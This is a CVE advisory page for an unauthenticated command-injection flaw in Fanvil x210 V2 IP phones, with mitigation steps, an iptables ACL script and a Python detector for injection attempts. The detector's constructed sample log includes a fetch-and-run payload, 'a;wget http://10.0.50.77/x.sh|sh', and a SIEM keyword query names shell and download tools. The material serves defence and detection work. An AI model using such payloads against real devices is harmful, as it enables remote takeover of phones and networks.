CVE-2025-64052

5.1 MEDIUM

📋 TL;DR

This vulnerability allows unauthenticated attackers on the same local network to execute arbitrary system commands on Fanvil x210 V2 IP phones. Attackers can gain full control of an affected device without any credentials. Any organization with these phones reachable from an untrusted host on the same network segment is exposed.

💻 Affected Systems

Products:
  • Fanvil x210 V2 IP Phone
Versions: 2.12.20
Operating Systems: Embedded Linux-based phone OS
Default Config Vulnerable: ⚠️ Yes
Notes: This entry names only firmware version 2.12.20. Whether earlier or later versions are affected is not stated; treat other versions as unverified rather than safe until the vendor confirms.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the IP phone, allowing attackers to install persistent malware, intercept calls, pivot to other network devices, or use the device as a foothold for lateral movement.

🟠 Likely Case

Attackers execute commands to reconfigure the phone, intercept VoIP traffic, or use the device as a proxy for network attacks.

🟢 If Mitigated

Limited impact if phones are isolated in a separate VLAN with strict network segmentation and access controls.

🌐 Internet-Facing: LOW (requires local network access, not directly exploitable from internet)
🏢 Internal Only: HIGH (exploitable by any device on the same local network without authentication)

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The linked GitHub advisory indicates that exploit details are public. The attack requires only network reachability to the phone; no credentials are needed, so password hygiene on the device does not reduce exposure.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: http://fanvil.com

Restart Required: Yes

Instructions:

1. Check the Fanvil website for security updates.
2. Download the latest firmware.
3. Upload it to the phone via the web interface.
4. Reboot the phone after the update.

🔧 Temporary Workarounds

Network Segmentation (all platforms)

Isolate IP phones in a dedicated VLAN with strict firewall rules between that VLAN and the rest of the network. Because the flaw is exploitable without credentials by any host on the same local network, the phone VLAN should contain only phones and the systems that must manage them; a single compromised workstation on the same segment is enough to reach every phone.

Access Control Lists (Linux gateway)

Restrict network access to the phones' management interfaces. Enforce the rules on the router or firewall between VLANs, not on the phone itself: a host on the same segment reaches the phone directly and is never filtered by an upstream device. Allow only the management or provisioning host, not a whole subnet, since every host in an allowed subnet is a potential attacker for a LAN-side unauthenticated bug. The port of the vulnerable service is not stated in this entry; port 80 below is the phone's web interface and is used as an example.

# Example (gateway FORWARD chain): 192.168.1.10 is the management host, 192.168.2.0/24 the phone VLAN
# iptables -A FORWARD -s 192.168.1.10 -d 192.168.2.0/24 -p tcp --dport 80 -j ACCEPT
# iptables -A FORWARD -d 192.168.2.0/24 -p tcp --dport 80 -j DROP
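The following script is an added example for the ACL workaround above; it is not part of this page or of Fanvil's guidance. It generates the gateway rules that confine the phones' web management interface to one management host, and prints them by default so they can be reviewed before being applied. All addresses, the chain name PHONE_MGMT and the port list are hypothetical: PHONE_NET is the phone VLAN, MGMT_HOST the PBX or provisioning server that legitimately manages the phones, and MGMT_PORTS the web UI ports (the vulnerable service port is not given in this entry, so 80/443 are assumptions).

```shell
#!/bin/sh
# Added example (not from the page or the vendor). Emits iptables rules for the
# FORWARD chain of the inter-VLAN router so that only MGMT_HOST can reach the phones'
# web management interface. Hosts inside PHONE_NET talk to the phones at layer 2 and
# are never seen by this filter, which is why the phone VLAN must contain phones only.
# All values below are hypothetical and can be overridden from the environment.

PHONE_NET="${PHONE_NET:-10.0.50.0/24}"     # assumed phone VLAN
MGMT_HOST="${MGMT_HOST:-10.0.10.5}"        # assumed PBX/provisioning server
MGMT_PORTS="${MGMT_PORTS:-80,443}"         # assumed web UI ports on the phones

# Print the rules as text. Nothing touches the firewall until the caller pipes this to sh.
# Order matters inside PHONE_MGMT: the single allowed source is accepted first, then
# everything else is logged (rate limited) and dropped. Allowing a whole source subnet
# here would re-admit the attacker population this bug is exposed to.
phone_acl_rules() {
    cat <<EOF
iptables -N PHONE_MGMT
iptables -A FORWARD -d $PHONE_NET -p tcp -m multiport --dports $MGMT_PORTS -j PHONE_MGMT
iptables -A PHONE_MGMT -s $MGMT_HOST -j ACCEPT
iptables -A PHONE_MGMT -m limit --limit 10/min -j LOG --log-prefix "PHONE_MGMT_DROP: "
iptables -A PHONE_MGMT -j DROP
EOF
}

if [ "${1:-show}" = "apply" ]; then
    phone_acl_rules | sh -e      # run as root on the gateway
else
    phone_acl_rules              # default: dry run, review the output first
fi
```

Run it with no arguments to see the rules, and with `apply` on the gateway once PHONE_NET, MGMT_HOST and MGMT_PORTS match your addressing. The LOG rule is what makes the "Detection & Monitoring" section below actionable: every dropped attempt to reach a phone's management port shows up in the gateway's kernel log with the PHONE_MGMT_DROP prefix.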

🧯 If You Can't Patch

  • Segment phones into dedicated VLAN with no access to critical systems
  • Implement strict firewall rules blocking all unnecessary traffic to phone management interfaces

🔍 How to Verify

Check if Vulnerable:

Check phone firmware version via web interface (Settings > System > Status) for version 2.12.20

Check Version (unauthenticated status endpoint, as listed for this entry; if it returns nothing on your firmware, use the web interface path above):

curl -s http://[phone-ip]/cgi-bin/getstatus.cgi | grep firmware

Verify Fix Applied:

Confirm the phone now reports a firmware version other than 2.12.20 and that the vendor's release notes for that version state that this CVE is addressed; this entry does not name a fixed version, so a different version number alone is not proof of a fix.

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in system logs
  • Management-interface requests from hosts other than the PBX or provisioning server (the exploit needs no credentials, so the absence of failed logins is not reassuring; the source host is the stronger signal)
  • Unexpected configuration changes

Network Indicators:

  • Unusual outbound connections from IP phones
  • Traffic to unexpected ports from phone management interface
  • HTTP requests with command injection patterns

SIEM Query (example; the phone runs embedded Linux, so Windows artifacts such as cmd.exe do not apply, and the tokens below are a starting point to be paired with a source-host filter):

source="phone_logs" AND ("bash" OR "/bin/sh" OR "wget" OR "curl")
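The script below is an added example for the detection section above; it is not code from this page or from Fanvil. It runs the two checks the indicators describe over access-log style records of HTTP requests to phones: a management-interface request from a host that is not the allow-listed management server, and a request target that, after URL decoding, carries shell metacharacters typical of command injection. The log format (client, phone, user, time, request, status, bytes) is what a network sensor or reverse proxy in front of the phone VLAN might write; the addresses, the allow-list, the date and the CGI path `example.cgi` are hypothetical, and the log lines are constructed for the example rather than captured traffic.

```python
"""
Added example (not from the page or the vendor): detection logic for command-injection
attempts against IP phones, run over constructed access-log lines.
"""
import re
from urllib.parse import unquote

MGMT_HOSTS = {"10.0.10.5"}       # assumed PBX/provisioning server allowed to manage phones
PHONE_NET_PREFIX = "10.0.50."    # assumed phone VLAN

# Assumed record layout: client phone user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<dst>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that terminate or chain commands. A single "&" is omitted because
# it is the normal query-string separator; "&&" is kept.
INJECTION_RE = re.compile(r';|\||`|\$\(|&&|\n')

# Constructed sample: line 1 and 4 are legitimate management traffic, line 2 is a phone
# VLAN host probing a phone, line 3 is that host sending a URL-encoded injection payload
# (the path /cgi-bin/example.cgi is hypothetical), line 5 is noise that must not crash us.
SAMPLE_LOGS = """\
10.0.10.5 10.0.50.21 - [12/Nov/2025:09:00:01 +0000] "GET /cgi-bin/getstatus.cgi HTTP/1.1" 200 512
10.0.50.77 10.0.50.21 - [12/Nov/2025:09:00:07 +0000] "GET /cgi-bin/getstatus.cgi HTTP/1.1" 200 512
10.0.50.77 10.0.50.21 - [12/Nov/2025:09:00:09 +0000] "POST /cgi-bin/example.cgi?name=a;wget%20http://10.0.50.77/x.sh%7Csh HTTP/1.1" 200 0
10.0.10.5 10.0.50.22 - [12/Nov/2025:09:01:00 +0000] "GET /index.html?a=1&b=2 HTTP/1.1" 200 2048
not a log line
"""


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match the layout."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode once so %3B, %7C, %0A and friends are inspected as the characters they encode.
    rec["decoded_target"] = unquote(rec["target"])
    return rec


def classify(rec):
    """Names of the checks a parsed record trips (several, one, or none)."""
    kinds = []
    if rec["dst"].startswith(PHONE_NET_PREFIX) and rec["src"] not in MGMT_HOSTS:
        kinds.append("unexpected_mgmt_client")
    if INJECTION_RE.search(rec["decoded_target"]):
        kinds.append("injection_pattern")
    return kinds


def analyze(log_text):
    """Scan a block of log text; return one finding per (record, tripped check) pair."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for kind in classify(rec):
            findings.append({
                "kind": kind,
                "src": rec["src"],
                "dst": rec["dst"],
                "target": rec["decoded_target"],
            })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f['kind']:24} {f['src']} -> {f['dst']} {f['target']}")
```

On the sample, the second line is flagged only as an unexpected management client, while the third line trips both checks once the `%7C` is decoded to `|`. The metacharacter check is the noisier of the two (a `;` can legitimately appear in some parameters), so in practice the source-host check should drive alerting and the pattern match should enrich the alert rather than raise one on its own.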
